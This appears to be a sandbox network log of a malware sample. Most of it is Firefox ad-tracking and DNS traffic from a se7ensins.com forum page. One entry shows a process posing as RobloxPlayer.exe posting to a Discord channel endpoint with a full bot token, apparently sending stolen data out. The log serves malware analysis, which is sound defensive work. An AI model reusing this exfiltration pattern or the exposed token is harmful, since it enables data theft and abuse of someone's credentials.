AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gpp=&gpp_sid= HTTP/2.0
host: ups.analytics.yahoo.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers
GET

https://gum.criteo.com/sid/json?origin=prebid&topUrl=https%3A%2F%2Fwww.se7ensins.com%2F&domain=www.se7ensins.com&cw=1&lsw=1&us_privacy=1---&gdprString=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdpr=1

firefox.exe

Remote address:

178.250.1.11:443

Request

GET /sid/json?origin=prebid&topUrl=https%3A%2F%2Fwww.se7ensins.com%2F&domain=www.se7ensins.com&cw=1&lsw=1&us_privacy=1---&gdprString=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdpr=1 HTTP/2.0
host: gum.criteo.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: application/json; charset=utf-8
date: Sun, 26 May 2024 02:06:24 GMT
server: Kestrel
access-control-allow-credentials: true
access-control-allow-methods: GET
access-control-allow-origin: https://www.se7ensins.com
cache-control: no-cache, no-store, must-revalidate
expires: 0
pragma: no-cache
server-processing-duration-in-ticks: 537108
strict-transport-security: max-age=31536000; preload;
vary: Accept-Encoding
content-encoding: gzip
POST

https://id5-sync.com/api/config/prebid

firefox.exe

Remote address:

162.19.138.83:443

Request

POST /api/config/prebid HTTP/2.0
host: id5-sync.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: text/plain;charset=UTF-8
content-length: 126
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

vary: Origin
vary: Access-Control-Request-Method
vary: Access-Control-Request-Headers
access-control-allow-origin: https://www.se7ensins.com
vary: Origin
access-control-allow-credentials: true
content-type: application/json;charset=UTF-8
date: Sun, 26 May 2024 02:06:24 GMT
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://api.rlcdn.com/api/identity/envelope?pid=106&ct=4&cv=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA

firefox.exe

Remote address:

34.120.133.55:443

Request

GET /api/identity/envelope?pid=106&ct=4&cv=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA HTTP/2.0
host: api.rlcdn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: text/plain
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers
OPTIONS

https://gum.criteo.com/sid/json?origin=prebid&topUrl=https%3A%2F%2Fwww.se7ensins.com%2F&domain=www.se7ensins.com&cw=1&lsw=1&us_privacy=1---&gdprString=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdpr=1

firefox.exe

Remote address:

178.250.1.11:443

Request

OPTIONS /sid/json?origin=prebid&topUrl=https%3A%2F%2Fwww.se7ensins.com%2F&domain=www.se7ensins.com&cw=1&lsw=1&us_privacy=1---&gdprString=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&gdpr=1 HTTP/2.0
host: gum.criteo.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
access-control-request-method: GET
access-control-request-headers: content-type
referer: https://www.se7ensins.com/
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

content-type: application/json; charset=utf-8
date: Sun, 26 May 2024 02:06:25 GMT
server: Kestrel
access-control-allow-credentials: true
access-control-allow-headers: content-type
access-control-allow-methods: GET
access-control-allow-origin: https://www.se7ensins.com
cache-control: no-cache, no-store, must-revalidate
expires: 0
pragma: no-cache
server-processing-duration-in-ticks: 370223
strict-transport-security: max-age=31536000; preload;
vary: Accept-Encoding
content-encoding: gzip
DNS

234.23.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

234.23.67.172.in-addr.arpa

IN PTR

Response
DNS

70.2.26.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

70.2.26.104.in-addr.arpa

IN PTR

Response
DNS

37.62.75.3.in-addr.arpa

Remote address:

8.8.8.8:53

Request

37.62.75.3.in-addr.arpa

IN PTR

Response

37.62.75.3.in-addr.arpa

IN PTR

ec2-3-75-62-37eu-central-1compute amazonawscom
DNS

aax.amazon-adsystem.com

firefox.exe

Remote address:

8.8.8.8:53

Request

aax.amazon-adsystem.com

IN A

Response

aax.amazon-adsystem.com

IN CNAME

aax-dtb-cf.amazon-adsystem.com

aax-dtb-cf.amazon-adsystem.com

IN CNAME

aax-dtb-cf.amazon-adsystem.amazon.com

aax-dtb-cf.amazon-adsystem.amazon.com

IN CNAME

d1jvc9b8z3vcjs.cloudfront.net

d1jvc9b8z3vcjs.cloudfront.net

IN A

3.162.148.221
DNS

11.1.250.178.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.1.250.178.in-addr.arpa

IN PTR

Response
DNS

198.40.223.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

198.40.223.52.in-addr.arpa

IN PTR

Response

198.40.223.52.in-addr.arpa

IN PTR

a6370ebea231e0c9aawsglobalacceleratorcom
DNS

83.138.19.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

83.138.19.162.in-addr.arpa

IN PTR

Response

83.138.19.162.in-addr.arpa

IN PTR

ns31532338 ip-162-19-138eu
DNS

d1jvc9b8z3vcjs.cloudfront.net

firefox.exe

Remote address:

8.8.8.8:53

Request

d1jvc9b8z3vcjs.cloudfront.net

IN A

Response

d1jvc9b8z3vcjs.cloudfront.net

IN A

3.162.148.221
DNS

55.133.120.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.133.120.34.in-addr.arpa

IN PTR

Response

55.133.120.34.in-addr.arpa

IN PTR

5513312034bcgoogleusercontentcom
DNS

d1jvc9b8z3vcjs.cloudfront.net

firefox.exe

Remote address:

8.8.8.8:53

Request

d1jvc9b8z3vcjs.cloudfront.net

IN AAAA

Response
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

RobloxPlayer.exe

Remote address:

162.159.137.232:443

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:06:25 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=8e93f4741b0411efac6aca1ee6b51077; Expires=Fri, 25-May-2029 02:06:25 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1716689186.703
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CJhlkuxApLg1ks2yPVpsCFLqvScG95OzLRfHNZYU5thZCvSW06M7xIIyvTn3fhCsuVjmvT2Oj8%2F0Fg3qkwoBmuxFDJldvmDUWpRVCUeGQcwrciIBx%2B2DkkjPxcqv"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=8e93f4741b0411efac6aca1ee6b51077e50d525b3b58883fe898e8b415b2c38d573d929b61034952dbd81395f956daa9; Expires=Fri, 25-May-2029 02:06:25 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=f27af07f4e7a4a26a024571840b52db4dd626823-1716689185; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=H0exMTldN7HARP141NX2yi4dqx1EX9OvFSPUBySwTSo-1716689185810-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a34af682cdce7-LHR
DNS

190.96.197.44.in-addr.arpa

Remote address:

8.8.8.8:53

Request

190.96.197.44.in-addr.arpa

IN PTR

Response

190.96.197.44.in-addr.arpa

IN PTR

ec2-44-197-96-190 compute-1 amazonawscom
GET

https://api.btloader.com/mw/state?bt_env=prod

firefox.exe

Remote address:

130.211.23.194:443

Request

GET /mw/state?bt_env=prod HTTP/2.0
host: api.btloader.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers
GET

https://api.btloader.com/country?o=5714937848528896

firefox.exe

Remote address:

130.211.23.194:443

Request

GET /country?o=5714937848528896 HTTP/2.0
host: api.btloader.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers
GET

https://api.btloader.com/pv?tid=ndz7IVwaO&w=5756214799499264&o=5714937848528896&cv=2.1.44-1-g797e4b1&widget=false&checksum=16b5899b&r=false&vr=1280x552&pageURL=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&sid=ffMWAjZas&c=true&pm=false&upapi=true

firefox.exe

Remote address:

130.211.23.194:443

Request

GET /pv?tid=ndz7IVwaO&w=5756214799499264&o=5714937848528896&cv=2.1.44-1-g797e4b1&widget=false&checksum=16b5899b&r=false&vr=1280x552&pageURL=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&sid=ffMWAjZas&c=true&pm=false&upapi=true HTTP/2.0
host: api.btloader.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers
DNS

14.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.227.111.52.in-addr.arpa

IN PTR

Response
DNS

194.23.211.130.in-addr.arpa

Remote address:

8.8.8.8:53

Request

194.23.211.130.in-addr.arpa

IN PTR

Response

194.23.211.130.in-addr.arpa

IN PTR

19423211130bcgoogleusercontentcom
POST

https://c.pub.network/v2/c

firefox.exe

Remote address:

34.160.152.31:443

Request

POST /v2/c HTTP/2.0
host: c.pub.network
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: application/json
content-length: 1062
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
cookie: _fsuid=6972e934-2e9a-46b6-a2c5-505b7bd4f2d7
te: trailers
OPTIONS

https://c.pub.network/v2/c

firefox.exe

Remote address:

34.160.152.31:443

Request

OPTIONS /v2/c HTTP/2.0
host: c.pub.network
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
